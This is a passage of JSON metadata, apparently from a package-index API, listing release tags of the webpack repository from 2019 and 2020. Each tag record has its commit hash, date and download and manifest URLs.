s.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","s